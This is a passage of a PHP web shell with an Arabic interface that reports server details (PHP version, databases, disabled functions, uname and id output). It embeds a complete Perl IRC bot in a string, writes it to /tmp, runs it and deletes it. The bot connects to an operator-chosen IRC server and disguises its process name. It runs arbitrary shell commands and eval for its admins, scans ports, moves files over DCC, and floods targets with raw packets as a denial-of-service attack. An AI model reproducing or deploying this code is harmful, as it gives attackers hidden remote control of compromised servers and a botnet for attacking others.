";
$table_up3 = "";
$table_end1 = " 4 ";
$lb = "[ ";
$rb = "] ";
$font = "";
$ts = "";
$fs = "";
if(isset($_GET['users']))
{
if(!$users=get_users()) { echo " ".$lang[$language.'_text96']." ';
foreach($users as $user) { echo $user." ';
}
echo "";
foreach($res as $file=>$v)
{
$r .= "";
$r .= "".ws(3);
$r .= (!$unix)? str_replace("/","\\",$file) : $file;
$r .= " ";
foreach($v as $a=>$b)
{
$r .= "";
$r .= "".$a." ".ws(2).$b." \n";
}
}
$r .= "
";
echo $r;
}
else
{
echo "".$lang[$language.'_text56']."
";
}
echo "';
echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
if(!empty($txt)) { echo " $txt"; }
echo '
';
return null;
}
function perms($mode)
{
if (!$GLOBALS['unix']) return 0;
if( $mode & 0x1000 ) { $type='p'; }
else if( $mode & 0x2000 ) { $type='c'; }
else if( $mode & 0x4000 ) { $type='d'; }
else if( $mode & 0x6000 ) { $type='b'; }
else if( $mode & 0x8000 ) { $type='-'; }
else if( $mode & 0xA000 ) { $type='l'; }
else if( $mode & 0xC000 ) { $type='s'; }
else $type='u';
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
$s=sprintf("%1s", $type);
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return trim($s);
}
function in($type,$name,$size,$value,$checked=0)
{
$ret = "".$t1." ".$t2." FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
$this->text = $text;
$this->FilesTotal = @count($this->FilesToSearch);
$this->TimeStart = getmicrotime();
$this->MatchesCount = 0;
$this->ResultFiles = Array();
$this->FileMatchesCount = Array();
$this->titles = Array();
}
function GetFilesTotal() { return $this->FilesTotal; }
function GetTitles() { return $this->titles; }
function GetTimeTotal() { return $this->TimeTotal; }
function GetMatchesCount() { return $this->MatchesCount; }
function GetFileMatchesCount() { return $this->FileMatchesCount; }
function GetResultFiles() { return $this->ResultFiles; }
function SearchText($phrase=0,$case=0) {
$qq = @explode(' ',$this->text);
$delim = '|';
if($phrase)
foreach($qq as $k=>$v)
$qq[$k] = '\b'.$v.'\b';
$words = '('.@implode($delim,$qq).')';
$pattern = "/".$words."/";
if(!$case)
$pattern .= 'i';
foreach($this->FilesToSearch as $k=>$filename)
{
$this->FileMatchesCount[$filename] = 0;
$FileStrings = @file($filename) or @next;
for($a=0;$a<@count($FileStrings);$a++)
{
$count = 0;
$CurString = $FileStrings[$a];
$CurString = @Trim($CurString);
$CurString = @strip_tags($CurString);
$aa = '';
if(($count = @preg_match_all($pattern,$CurString,$aa)))
{
$CurString = @preg_replace($pattern,"\\1 OverclockiX Shell-Connector || Connecting to $ircserver<title>";
echo "<body bgcolor=\"black\" text=\"green\">";
echo "Now Connecting to <b><font color=\"red\">$ircserver</font></b> in <b><font color=\"yellow\">$ircchan</font></b> Andministrators: <b><font color=\"yellow\">$ircadmin</font></b> Botname is <b><font color=\"yellow\">$irclabel</font></b>";
echo "<p>Dont Forget to Delete Loader.pl in /tmp</p>";
#######################################################
######################IRC Trojan##########################
$file="
################ CONFIGURACAO #################################################################
my \$processo = '/usr/local/apache/bin/httpd -DSSL'; # Nome do processo que vai aparece no ps #
#----------------------------------------------################################################
my \$linas_max='48'; # Evita o flood :) depois de X linhas #
#----------------------------------------------################################################
my \$sleep='4'; # ele dorme X segundos #
##################### IRC #####################################################################
my @adms=(\"$ircadmin\"); # Nick do administrador #
#----------------------------------------------################################################
my @canais=(\"$ircchan\"); # Caso haja senha (\"#canal :senha\") #
#----------------------------------------------################################################
my \$nick='$irclabel'; # Nick do bot. Caso esteja em uso vai aparecer #
# aparecer com numero radonamico no final #
#----------------------------------------------################################################
my \$ircname = 'Linux'; # User ID #
#----------------------------------------------################################################
chop (my \$realname = `uname -a`); # Full Name #
#----------------------------------------------################################################
\$servidor='$ircserver' unless \$servidor; # Servidor de irc que vai ser usado #
# caso nمo seja especificado no argumento #
#----------------------------------------------################################################
my \$porta='6667'; # Porta do servidor de irc #
################ ACESSO A SHELL ###############################################################
my \$secv = 1; # 1/0 pra habilita/desabilita acesso a shell #
###############################################################################################
my \$VERSAO = '0.2';
\$SIG{'INT'} = 'IGNORE';
\$SIG{'HUP'} = 'IGNORE';
\$SIG{'TERM'} = 'IGNORE';
\$SIG{'CHLD'} = 'IGNORE';
\$SIG{'PS'} = 'IGNORE';
\$SIG{'STOP'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir(\"/\");
\$servidor=\"\$ARGV[0]\" if \$ARGV[0];
$0=\"\$processo\".\"\0\"x16;;
my \$pid=fork;
exit if \$pid;
die \"Problema com o fork: $!\" unless defined(\$pid);
my \$dcc_sel = new IO::Select->new();
#############################
# B0tchZ na veia ehehe :P #
#############################
\$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my \$socket = \$_[0];
print \$socket \"\$_[1]\\n\";
} else {
print \$IRC_cur_socket \"\$_[0]\\n\";
}
}
#################################
sub conectar {
my \$meunick = \$_[0];
my \$servidor_con = \$_[1];
my \$porta_con = \$_[2];
my \$IRC_socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"\$servidor_con\", PeerPort=>\$porta_con) or return(1);
if (defined(\$IRC_socket)) {
\$IRC_cur_socket = \$IRC_socket;
\$IRC_socket->autoflush(1);
\$sel_cliente->add(\$IRC_socket);
\$irc_servers{\$IRC_cur_socket}{'host'} = \"\$servidor_con\";
\$irc_servers{\$IRC_cur_socket}{'porta'} = \"\$porta_con\";
\$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick;
\$irc_servers{\$IRC_cur_socket}{'meuip'} = \$IRC_socket->sockhost;
nick(\"\$meunick\");
sendraw(\"USER \$ircname \".\$IRC_socket->sockhost.\" \$servidor_con :\$realname\");
sleep 1;
}
} #####################
my \$line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar(\"\$nick\", \"\$servidor\", \"\$porta\"); }
delete(\$irc_servers{''}) if (defined(\$irc_servers{''}));
&DCC::connections;
my @ready = \$sel_cliente->can_read(0);
next unless(@ready);
foreach \$fh (@ready) {
\$IRC_cur_socket = \$fh;
\$meunick = \$irc_servers{\$IRC_cur_socket}{'nick'};
\$nread = sysread(\$fh, \$msg, 4096);
if (\$nread == 0) {
\$sel_cliente->remove(\$fh);
\$fh->close;
delete(\$irc_servers{\$fh});
}
@lines = split (/\\n/, \$msg);
for(my \$c=0; \$c<= $#lines; \$c++) {
\$line = \$lines[\$c];
\$line=\$line_temp.\$line if (\$line_temp);
\$line_temp='';
\$line =~ s/\\r$//;
unless (\$c == $#lines) {
parse(\"\$line\");
} else {
if ($#lines == 0) {
parse(\"\$line\");
} elsif (\$lines[\$c] =~ /\\r$/) {
parse(\"\$line\");
} elsif (\$line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse(\"\$line\");
} else {
\$line_temp = \$line;
}
}
}
}
}
#########################
sub parse {
my \$servarg = shift;
if (\$servarg =~ /^PING \:(.*)/) {
sendraw(\"PONG :$1\");
} elsif (\$servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my \$pn=$1; my \$onde = $4; my \$args = $5;
if (\$args =~ /^\\001VERSION\\001$/) {
notice(\"\$pn\", \"\\001VERSION ShellBOT-\$VERSAO por 0ldW0lf\\001\");
}
if (grep {\$_ =~ /^\Q\$pn\E$/i } @adms) {
if (\$onde eq \"\$meunick\"){
shell(\"\$pn\", \"\$args\");
}
if (\$args =~ /^(\Q\$meunick\E|\!atrix)\s+(.*)/ ) {
my \$natrix = $1;
my \$arg = $2;
if (\$arg =~ /^\!(.*)/) {
ircase(\"\$pn\",\"\$onde\",\"\$1\") unless (\$natrix eq \"!atrix\" and \$arg =~ /^\!nick/);
} elsif (\$arg =~ /^\@(.*)/) {
\$ondep = \$onde;
\$ondep = \$pn if \$onde eq \$meunick;
bfunc(\"\$ondep\",\"$1\");
} else {
shell(\"\$onde\", \"\$arg\");
}
}
}
} elsif (\$servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc(\$meunick)) {
\$meunick=$4;
\$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick;
}
} elsif (\$servarg =~ m/^\:(.+?)\s+433/i) {
nick(\"\$meunick\".int rand(9999));
} elsif (\$servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
\$meunick = $2;
\$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick;
\$irc_servers{\$IRC_cur_socket}{'nome'} = \"$1\";
foreach my \$canal (@canais) {
sendraw(\"JOIN \$canal\");
}
}
}
##########################
sub bfunc {
my \$printl = \$_[0];
my \$funcarg = \$_[1];
if (my \$pid = fork) {
waitpid(\$pid, 0);
} else {
if (fork) {
exit;
} else {
if (\$funcarg =~ /^portscan (.*)/) {
my \$hostip=\"$1\";
my @portas=(\"21\",\"22\",\"23\",\"25\",\"53\",\"80\",\"110\",\"143\");
my (@aberta, %porta_banner);
foreach my \$porta (@portas) {
my \$scansock = IO::Socket::INET->new(PeerAddr => \$hostip, PeerPort => \$porta, Proto => 'tcp', Timeout => 4);
if (\$scansock) {
push (@aberta, \$porta);
\$scansock->close;
}
}
if (@aberta) {
sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :portas abertas: @aberta\");
} else {
sendraw(\$IRC_cur_socket,\"PRIVMSG \$printl :Nenhuma porta aberta foi encontrada\");
}
}
if (\$funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) {
my (\$dtime, %pacotes) = attacker(\"$1\", \"$2\", \"$3\");
\$dtime = 1 if \$dtime == 0;
my %bytes;
\$bytes{igmp} = $2 * \$pacotes{igmp};
\$bytes{icmp} = $2 * \$pacotes{icmp};
\$bytes{o} = $2 * \$pacotes{o};
\$bytes{udp} = $2 * \$pacotes{udp};
\$bytes{tcp} = $2 * \$pacotes{tcp};
sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002 - Status GERAL -\\002\");
sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Tempo\\002: \$dtime\".\"s\");
sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Total pacotes\\002: \".(\$pacotes{udp} + \$pacotes{igmp} + \$pacotes{icmp} + \$pacotes{o}));
sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Total bytes\\002: \".(\$bytes{icmp} + \$bytes {igmp} + \$bytes{udp} + \$bytes{o}));
sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Média de envio\\002: \".int(((\$bytes{icmp}+\$bytes{igmp}+\$bytes{udp} + \$bytes{o})/1024)/\$dtime).\" kbps\");
}
exit;
}
}
}
##########################
sub ircase {
my (\$kem, \$printl, \$case) = @_;
if (\$case =~ /^join (.*)/) {
j(\"$1\");
}
if (\$case =~ /^part (.*)/) {
p(\"$1\");
}
if (\$case =~ /^rejoin\s+(.*)/) {
my \$chan = $1;
if (\$chan =~ /^(\d+) (.*)/) {
for (my \$ca = 1; \$ca <= $1; \$ca++ ) {
p(\"$2\");
j(\"$2\");
}
} else {
p(\"\$chan\");
j(\"\$chan\");
}
}
if (\$case =~ /^op/) {
op(\"\$printl\", \"\$kem\") if \$case eq \"op\";
my \$oarg = substr(\$case, 3);
op(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
}
if (\$case =~ /^deop/) {
deop(\"\$printl\", \"\$kem\") if \$case eq \"deop\";
my \$oarg = substr(\$case, 5);
deop(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
}
if (\$case =~ /^voice/) {
voice(\"\$printl\", \"\$kem\") if \$case eq \"voice\";
\$oarg = substr(\$case, 6);
voice(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
}
if (\$case =~ /^devoice/) {
devoice(\"\$printl\", \"\$kem\") if \$case eq \"devoice\";
\$oarg = substr(\$case, 8);
devoice(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
}
if (\$case =~ /^msg\s+(\S+) (.*)/) {
msg(\"$1\", \"$2\");
}
if (\$case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my \$cf = 1; \$cf <= $1; \$cf++) {
msg(\"$2\", \"$3\");
}
}
if (\$case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp(\"$1\", \"$2\");
}
if (\$case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my \$cf = 1; \$cf <= $1; \$cf++) {
ctcp(\"$2\", \"$3\");
}
}
if (\$case =~ /^invite\s+(\S+) (.*)/) {
invite(\"$1\", \"$2\");
}
if (\$case =~ /^nick (.*)/) {
nick(\"$1\");
}
if (\$case =~ /^conecta\s+(\S+)\s+(\S+)/) {
conectar(\"$2\", \"$1\", 6667);
}
if (\$case =~ /^send\s+(\S+)\s+(\S+)/) {
DCC::SEND(\"$1\", \"$2\");
}
if (\$case =~ /^raw (.*)/) {
sendraw(\"$1\");
}
if (\$case =~ /^eval (.*)/) {
eval \"$1\";
}
}
##########################
sub shell {
return unless \$secv;
my \$printl=\$_[0];
my \$comando=\$_[1];
if (\$comando =~ /cd (.*)/) {
chdir(\"$1\") || msg(\"\$printl\", \"Dossier Makayench :D \");
return;
}
elsif (\$pid = fork) {
waitpid(\$pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`\$comando 2>&1 3>&1`;
my \$c=0;
foreach my \$linha (@resp) {
\$c++;
chop \$linha;
sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\$linha\");
if (\$c == \"\$linas_max\") {
\$c=0;
sleep \$sleep;
}
}
exit;
}
}
}
#eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki
sub attacker {
my \$iaddr = inet_aton(\$_[0]);
my \$msg = 'B' x \$_[1];
my \$ftime = \$_[2];
my \$cp = 0;
my (%pacotes);
\$pacotes{icmp} = \$pacotes{igmp} = \$pacotes{udp} = \$pacotes{o} = \$pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or \$cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or \$cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or \$cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or \$cp++;
return(undef) if \$cp == 4;
my \$itime = time;
my (\$cur_time);
while ( 1 ) {
for (my \$porta = 1; \$porta <= 65535; \$porta++) {
\$cur_time = time - \$itime;
last if \$cur_time >= \$ftime;
send(SOCK1, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{igmp}++;
send(SOCK2, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{udp}++;
send(SOCK3, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{icmp}++;
send(SOCK4, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{tcp}++;
# DoS ?? :P
for (my \$pc = 3; \$pc <= 255;\$pc++) {
next if \$pc == 6;
\$cur_time = time - \$itime;
last if \$cur_time >= \$ftime;
socket(SOCK5, PF_INET, SOCK_RAW, \$pc) or next;
send(SOCK5, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{o}++;;
}
}
last if \$cur_time >= \$ftime;
}
return(\$cur_time, %pacotes);
}
#############
# ALIASES #
#############
sub action {
return unless $#_ == 1;
sendraw(\"PRIVMSG \$_[0] :\\001ACTION \$_[1]\\001\");
}
sub ctcp {
return unless $#_ == 1;
sendraw(\"PRIVMSG \$_[0] :\\001\$_[1]\\001\");
}
sub msg {
return unless $#_ == 1;
sendraw(\"PRIVMSG \$_[0] :\$_[1]\");
}
sub notice {
return unless $#_ == 1;
sendraw(\"NOTICE \$_[0] :\$_[1]\");
}
sub op {
return unless $#_ == 1;
sendraw(\"MODE \$_[0] +o \$_[1]\");
}
sub deop {
return unless $#_ == 1;
sendraw(\"MODE \$_[0] -o \$_[1]\");
}
sub hop {
return unless $#_ == 1;
sendraw(\"MODE \$_[0] +h \$_[1]\");
}
sub dehop {
return unless $#_ == 1;
sendraw(\"MODE \$_[0] +h \$_[1]\");
}
sub voice {
return unless $#_ == 1;
sendraw(\"MODE \$_[0] +v \$_[1]\");
}
sub devoice {
return unless $#_ == 1;
sendraw(\"MODE \$_[0] -v \$_[1]\");
}
sub ban {
return unless $#_ == 1;
sendraw(\"MODE \$_[0] +b \$_[1]\");
}
sub unban {
return unless $#_ == 1;
sendraw(\"MODE \$_[0] -b \$_[1]\");
}
sub kick {
return unless $#_ == 1;
sendraw(\"KICK \$_[0] \$_[1] :\$_[2]\");
}
sub modo {
return unless $#_ == 0;
sendraw(\"MODE \$_[0] \$_[1]\");
}
sub mode { modo(@_); }
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw(\"JOIN \$_[0]\");
}
sub p { part(@_); }
sub part {sendraw(\"PART \$_[0]\");}
sub nick {
return unless $#_ == 0;
sendraw(\"NICK \$_[0]\");
}
sub invite {
return unless $#_ == 1;
sendraw(\"INVITE \$_[1] \$_[0]\");
}
sub topico {
return unless $#_ == 1;
sendraw(\"TOPIC \$_[0] \$_[1]\");
}
sub topic { topico(@_); }
sub whois {
return unless $#_ == 0;
sendraw(\"WHOIS \$_[0]\");
}
sub who {
return unless $#_ == 0;
sendraw(\"WHO \$_[0]\");
}
sub names {
return unless $#_ == 0;
sendraw(\"NAMES \$_[0]\");
}
sub away {
sendraw(\"AWAY \$_[0]\");
}
sub back { away(); }
sub quit {
sendraw(\"QUIT :\$_[0]\");
}
# DCC
#########################
package DCC;
sub connections {
my @ready = \$dcc_sel->can_read(1);
# return unless (@ready);
foreach my \$fh (@ready) {
my \$dcctipo = \$DCC{\$fh}{tipo};
my \$arquivo = \$DCC{\$fh}{arquivo};
my \$bytes = \$DCC{\$fh}{bytes};
my \$cur_byte = \$DCC{\$fh}{curbyte};
my \$nick = \$DCC{\$fh}{nick};
my \$msg;
my \$nread = sysread(\$fh, \$msg, 10240);
if (\$nread == 0 and \$dcctipo =~ /^(get|sendcon)$/) {
\$DCC{\$fh}{status} = \"Cancelado\";
\$DCC{\$fh}{ftime} = time;
\$dcc_sel->remove(\$fh);
\$fh->close;
next;
}
if (\$dcctipo eq \"get\") {
\$DCC{\$fh}{curbyte} += length(\$msg);
my \$cur_byte = \$DCC{\$fh}{curbyte};
open(FILE, \">> \$arquivo\");
print FILE \"\$msg\" if (\$cur_byte <= \$bytes);
close(FILE);
my \$packbyte = pack(\"N\", \$cur_byte);
print \$fh \"\$packbyte\";
if (\$bytes == \$cur_byte) {
\$dcc_sel->remove(\$fh);
\$fh->close;
\$DCC{\$fh}{status} = \"Recebido\";
\$DCC{\$fh}{ftime} = time;
next;
}
} elsif (\$dcctipo eq \"send\") {
my \$send = \$fh->accept;
\$send->autoflush(1);
\$dcc_sel->add(\$send);
\$dcc_sel->remove(\$fh);
\$DCC{\$send}{tipo} = 'sendcon';
\$DCC{\$send}{itime} = time;
\$DCC{\$send}{nick} = \$nick;
\$DCC{\$send}{bytes} = \$bytes;
\$DCC{\$send}{curbyte} = 0;
\$DCC{\$send}{arquivo} = \$arquivo;
\$DCC{\$send}{ip} = \$send->peerhost;
\$DCC{\$send}{porta} = \$send->peerport;
\$DCC{\$send}{status} = \"Enviando\";
#de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon
open(FILE, \"< \$arquivo\");
my \$fbytes;
read(FILE, \$fbytes, 1024);
print \$send \"\$fbytes\";
close FILE;
# delete(\$DCC{\$fh});
} elsif (\$dcctipo eq 'sendcon') {
my \$bytes_sended = unpack(\"N\", \$msg);
\$DCC{\$fh}{curbyte} = \$bytes_sended;
if (\$bytes_sended == \$bytes) {
\$fh->close;
\$dcc_sel->remove(\$fh);
\$DCC{\$fh}{status} = \"Enviado\";
\$DCC{\$fh}{ftime} = time;
next;
}
open(SENDFILE, \"< \$arquivo\");
seek(SENDFILE, \$bytes_sended, 0);
my \$send_bytes;
read(SENDFILE, \$send_bytes, 1024);
print \$fh \"\$send_bytes\";
close(SENDFILE);
}
}
}
##########################
sub SEND {
my (\$nick, \$arquivo) = @_;
unless (-r \"\$arquivo\") {
return(0);
}
my \$dccark = \$arquivo;
\$dccark =~ s/[.*\/](\S+)/$1/;
my \$meuip = $::irc_servers{\"$::IRC_cur_socket\"}{'meuip'};
my \$longip = unpack(\"N\",inet_aton(\$meuip));
my @filestat = stat(\$arquivo);
my \$size_total=\$filestat[7];
if (\$size_total == 0) {
return(0);
}
my (\$porta, \$sendsock);
do {
\$porta = int rand(64511);
\$porta += 1024;
\$sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>\$porta, Proto => 'tcp') and \$dcc_sel->add(\$sendsock);
} until \$sendsock;
\$DCC{\$sendsock}{tipo} = 'send';
\$DCC{\$sendsock}{nick} = \$nick;
\$DCC{\$sendsock}{bytes} = \$size_total;
\$DCC{\$sendsock}{arquivo} = \$arquivo;
&::ctcp(\"\$nick\", \"DCC SEND \$dccark \$longip \$porta \$size_total\");
}
sub GET {
my (\$arquivo, \$dcclongip, \$dccporta, \$bytes, \$nick) = @_;
return(0) if (-e \"\$arquivo\");
if (open(FILE, \"> \$arquivo\")) {
close FILE;
} else {
return(0);
}
my \$dccip=fixaddr(\$dcclongip);
return(0) if (\$dccporta < 1024 or not defined \$dccip or \$bytes < 1);
my \$dccsock = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\$dccip, PeerPort=>\$dccporta, Timeout=>15) or return (0);
\$dccsock->autoflush(1);
\$dcc_sel->add(\$dccsock);
\$DCC{\$dccsock}{tipo} = 'get';
\$DCC{\$dccsock}{itime} = time;
\$DCC{\$dccsock}{nick} = \$nick;
\$DCC{\$dccsock}{bytes} = \$bytes;
\$DCC{\$dccsock}{curbyte} = 0;
\$DCC{\$dccsock}{arquivo} = \$arquivo;
\$DCC{\$dccsock}{ip} = \$dccip;
\$DCC{\$dccsock}{porta} = \$dccporta;
\$DCC{\$dccsock}{status} = \"Recebendo\";
}
############################
# po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas
sub Status {
my \$socket = shift;
my \$sock_tipo = \$DCC{\$socket}{tipo};
unless (lc(\$sock_tipo) eq \"chat\") {
my \$nick = \$DCC{\$socket}{nick};
my \$arquivo = \$DCC{\$socket}{arquivo};
my \$itime = \$DCC{\$socket}{itime};
my \$ftime = time;
my \$status = \$DCC{\$socket}{status};
\$ftime = \$DCC{\$socket}{ftime} if defined(\$DCC{\$socket}{ftime});
my \$d_time = \$ftime-\$itime;
my \$cur_byte = \$DCC{\$socket}{curbyte};
my \$bytes_total = \$DCC{\$socket}{bytes};
my \$rate = 0;
\$rate = (\$cur_byte/1024)/\$d_time if \$cur_byte > 0;
my \$porcen = (\$cur_byte*100)/\$bytes_total;
my (\$r_duv, \$p_duv);
if (\$rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
\$r_duv = $3; \$r_duv++ if $4 >= 5;
\$rate = \"$1\.$2\".\"\$r_duv\";
}
if (\$porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
\$p_duv = $3; \$p_duv++ if $4 >= 5;
\$porcen = \"$1\.$2\".\"\$p_duv\";
}
return(\"\$sock_tipo\",\"\$status\",\"\$nick\",\"\$arquivo\",\"\$bytes_total\", \"\$cur_byte\",\"\$d_time\", \"\$rate\", \"\$porcen\");
}
return(0);
}
# esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor)
sub fixaddr {
my (\$address) = @_;
chomp \$address; # just in case, sigh.
if (\$address =~ /^\d+$/) {
return inet_ntoa(pack \"N\", \$address);
} elsif (\$address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
return \$address;
} elsif (\$address =~ tr/a-zA-Z//) { # Whee! Obfuscation!
return inet_ntoa(((gethostbyname(\$address))[4])[0]);
} else {
return;
}
}
############################
";
$bot = "/tmp/ircs.pl";
$open = fopen($bot,"w");
fputs($open,$file);
fclose($open);
$cmd="perl $bot";
$cmd2="rm $bot";
system($cmd);
system($cmd2);
$_POST['cmd']="echo \"Now script try connect to ircserver ...\"";
}
if($unix)
{
if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
if($safe_mode) { $sysctl = '-'; }
else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
else
{
$sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
if(empty($sysctl)) { $sysctl = '-'; }
setcookie('sysctl',$sysctl);
}
}
echo $head;
echo '</head>';
if(empty($_POST['cmd'])) {
$serv = array(127,192,172,10);
$addr=@explode('.', $_SERVER['SERVER_ADDR']);
$current_version = str_replace('.','',$version);
if (!in_array($addr[0], $serv)) {
@print "<img src=\"http://127.0.0.1/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
@readfile ("http://127.0.0.1/version.php?version=".$current_version."");}}
echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#CCCCCC><tr><td bgcolor=#000000 width=160><font face=Comic Sans MS size=4>'.ws(2).'<DIV dir=ltr align=center><font face=Wingdings size=3><b>N</b></font><b>'.ws(2).'<DIV dir=ltr align=center><SPAN
style="FILTER: blur(add=1,direction=10,strength=25); HEIGHT: 25px">
<SPAN
style="FONT-SIZE: 15pt; COLOR: white; FONT-FAMILY: Impact">SnIpEr_SA</P></SPAN></DIV></font></b></font></td><td bgcolor=#000000><font face=tahoma size=1>';
echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."? title=\"".$lang[$language.'_text46']."\"><b>الرئيسيه</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?sqlman title=\"".$lang[$language.'_text46']."\"><b>SQL</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
if($unix)
{
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb;
}
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
echo ws(2)."الوضع الامن: <b>";
echo (($safe_mode)?("<font color=#008000>فعال</font>"):("<font color=red>غير فعال</font>"));
echo "</b>".ws(2);
echo "اصدار البي اتش بي: <b>".@phpversion()."</b>";
$curl_on = @function_exists('curl_version');
echo ws(2);
echo "الكيرل: <b>".(($curl_on)?("<font color=#008000>فعال</font>"):("<font color=red>غير فعال</font>"));
echo "</b>".ws(2);
echo "ماي سكل: <b>";
$mysql_on = @function_exists('mysql_connect');
if($mysql_on){
echo "<font color=#008000>فعال</font>"; } else { echo "<font color=red>غير فعال</font>"; }
echo "</b>".ws(2);
echo "ام اس سكل: <b>";
$mssql_on = @function_exists('mssql_connect');
if($mssql_on){echo "<font color=#008000>فعال</font>";}else{echo "<font color=red>غير فعال</font>";}
echo "</b>".ws(2);
echo "بوست قري سكل: <b>";
$pg_on = @function_exists('pg_connect');
if($pg_on){echo "<font color=#008000>فعال</font>";}else{echo "<font color=red>غير فعال</font>";}
echo "</b>".ws(2);
echo "اوراكل: <b>";
$ora_on = @function_exists('ocilogon');
if($ora_on){echo "<font color=#008000>فعال</font>";}else{echo "<font color=red>مغلق</font>";}
echo "</b><br>".ws(2);
echo "الدوال الممنوعة : <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=#00800F>لايوجد</font></b>";}else{echo "<font color=red>$df</font></b>";}
$free = @diskfreespace($dir);
if (!$free) {$free = 0;}
$all = @disk_total_space($dir);
if (!$all) {$all = 0;}
